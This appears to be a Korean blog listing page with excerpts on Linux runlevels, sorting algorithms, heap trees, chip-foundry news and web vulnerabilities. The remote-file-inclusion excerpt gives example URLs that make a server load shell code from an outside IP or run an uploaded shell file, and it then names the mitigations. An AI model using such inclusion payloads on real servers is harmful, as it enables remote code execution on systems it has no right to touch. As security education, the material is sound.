본문 바로가기
알고리즘 바로가기
보안 포스트 바로가기
JAVA 바로가기
리눅스 서버 바로가기
Run Level - 부트레벨 Runlevel 명령어는 현재 리눅스 시스템의 실행레벨을 확인한다. 부트레벨 영문명 작동 비고 0 ( Init 0 ) Power Off 시스템 종료, halt, shutdown now 1 ( Init 1 ) Rescue 싱글모드, 복구모드 root만 사용가능, 콘솔로만 접근가능, 단일 사용자 모드 2 ( Init 2 ) Multi-User NFS 미지원 멀티유저 모드 3 ( Init 3 ) Multi-User NFS 지원 멀티유저 모드 4 ( Init 4 ) Multi-User 사용하지 않음, 사용자가 직접 지정가능 사용하지 않음 5 ( Init 5 ) Graphical X윈도우 환경으로 실행되는 멀티유저 실행모드 6 ( Init 6 ) Reboot 서버 재부팅되는 모드, reboot 런레벨 모드는 /l..
5. 힙 트리 ( Heap Tree ) 트리형 자료구조에서 최대값, 최소값을 빠르게 찾아내기 위해 고안된 자료구조이다. 단순한 규칙 하나를 가지고 있는데 부모의 값은 항상 자식들의 값보다 크거나 작아야 한다. 최소값을 구할 때는 부모의값이, 최대값을 구할 때는 자식의 값이 작아야한다. (최소 힙, 최대 힙) 힙 트리의 삽입과정은 다음과 같다. 9가 삽입될 때, 해당 트리에서 최소힙을 구하는 과정 1, 최하위 노드를 삽입한다. 2, 부모노드와 비교하여 조건에 부합할 경우, 부모노드와 교환한다. 3, 위 과정을 반복한다. 삭제 과정은 루트 노드를 제거 후, 루트자리에 마지막노드를 삽입하고 자식노드들과 비교하는 형식으로 이루어진다.
4. 악성파일 실행, LFI, RFI ( Remote File Include ) Remote File Include는 서버 외부에 존재하는 공격자가 악성 스크립트를 서버에 전달하여 코드가 해석,실행되게 하는 공격이다. 서버가 코드를 실행한다는 점에서 방법으로써 부를 때 XSS, 해당 문제를 직접 가르킬 때 RFI라고 표현하기도 한다. /Index.php?loading="http://192.168.131.105/shellobject.txt /Index.php?loading="C:\www\ftproot\userfile\shellobject 위는 서버가 직접 공격자의 클라이언트(서버)로 접속하여 쉘코드를 받아오게 만들 수 있으며, 아래는 다운로드된 혹은 공격자에 의해 업로드된 쉘코드를 실행하게 만들 수 있다. 『 해결 방법 』 allow_url_fopen, include 옵션 설정, ph..
4. 합병 정렬 합병 정렬은 주어진 n길이의 리스트에서 작은 집합을 여러개 만들어 비교하고 여러 집합을 병합해과는 과정에서 리스트를 정렬해나가는 방법이다. 1. 분할단계는 리스트를 성분이 2개가 될 때까지 분할한다. 2. 병합단계는 2개의 성분을 가진 리스트에서 정렬하여 병합된 리스트에 삽입한다. 3. 모든 리스트가 주어진 길이 n이 될 때까지 병합을 반복한다 합병정렬의 방법 출처: https://ko.wikipedia.org/wiki/%ED%95%A9%EB%B3%91_%EC%A0%95%EB%A0%AC 합병 정렬 - 위키백과, 우리 모두의 백과사전 합병 정렬 또는 병합 정렬(merge sort)은 O(n log n) 비교 기반 정렬 알고리즘이다. 일반적인 방법으로 구현했을 때 이 정렬은 안정 정렬에 속하며, 분할 정복 ..
3. SQL Injection 어플리케이션에 사용자가 서버로 문구를 전송할 수 있을 경우, SQL문구를 삽입하여 데이터베이스를 악의적으로 조작하는 방법이다. 과거 SQL은 prepared statement의 부재로 오류 메시지를 클라이언트 단에 직접 전송하는 경우가 있었다, 이에 사용자가 오류메시지에 따른 데이터 베이스 상태를 확인할 수 있어 공격자가 해당 데이터베이스의 테이블 구조, 그리고 중요 정보에 대한 색인 또한 가능하게 되는 문제점이 있었다. 근래는 대다수의 데이터베이스 프레임워크에서 Prepared statement, 객체를 적용하여 우선 쿼리로써 적용하지 않고 구문분석 이후 바인딩된 데이터를 컴파일러등으로 처리하게 되므로 의미있는 쿼리로써 사용할 수 없다.
2. XSS (사이트 간 스크립팅) XSS (사이트간 스크립팅), 영문명칭 (cross-site scripting) 은 악성 사용자가 페이지, 혹은 어플케이션에서 서버에 악성스크립트를 가진 문장, 쿼리등을 보내는 취약점을 의미한다. 사용자는 해당 페이지, 링크 등을 실행하게 될 경우, 악성 스크립트가 실행이 될 우려가 있다. XSS의 큰 흐름은 악성코드가 삽입된 파일등을 게시하여 시스템 명령어 실행을 유도하는 것으로 설명된다. 가장 기본적인 방법으로 사용자에게 저장된 Script를 실행시키는 방법에서부터 구문 분석 취약점을 병행 이용하여 사용자에게 허용되지 않은 알림창 정도를 띄우는 것에서부터 쿠키,세션 정보의 탈취나 쉘 권한 탈취, Botnet 공격으로까지 이어질 수 있어 주의를 요한다. 『 Stored XSS 』 위 그림에서 설명된 사..
3. 버블 정렬 버블 정렬은 인접한 두 원소를 검사해 정렬하는 알고리즘이다. 선택 정렬은 앞자리를 제하고, 남은 것 중 최소값을 찾는 방식으로 추출 했었으나, 버블 정렬에서는 모든 값을 다회 비교하기 위해 한 자리에서 두 번 이상의 교체가 이루어지는 경우가 있다. 1. 주어진 리스트의 첫번째 값과 인접한 값을 비교한다. 2. 두 값의 크기 순서가 일치하지 않을 경우, 교환한다. 3. 각 자리별로 순서대로 반복하며, 모든 자리의 값 크기 순서가 맞을 때 까지 순회한다. 리스트가 [ 5,4,2,1,0,3 ] 일 경우, 큰 수부터 정렬하는 예시 1순회 pass table 자리교환 0 5,4,2,1,0,3 1 5,4,2,1,0,3 X 2 5,4,2,1,0,3 X 3 5,4,2,1,0,3 X 4 5,4,2,1,0,3 X 5 5,..
Intel과 TSMC가 파운드리 경쟁에 불을 붙이다. https://www.techpowerup.com/289886/intel-and-tsmc-said-to-be-eyeing-germany-for-new-foundries Intel and TSMC Said to be Eyeing Germany for New Foundries A fight over who can announce the most new chip related investments seem to have broken out between Intel and TSMC, which both companies said to be eyeing Germany for their new foundry expansions. This is despite both companies having said that ..

티스토리툴바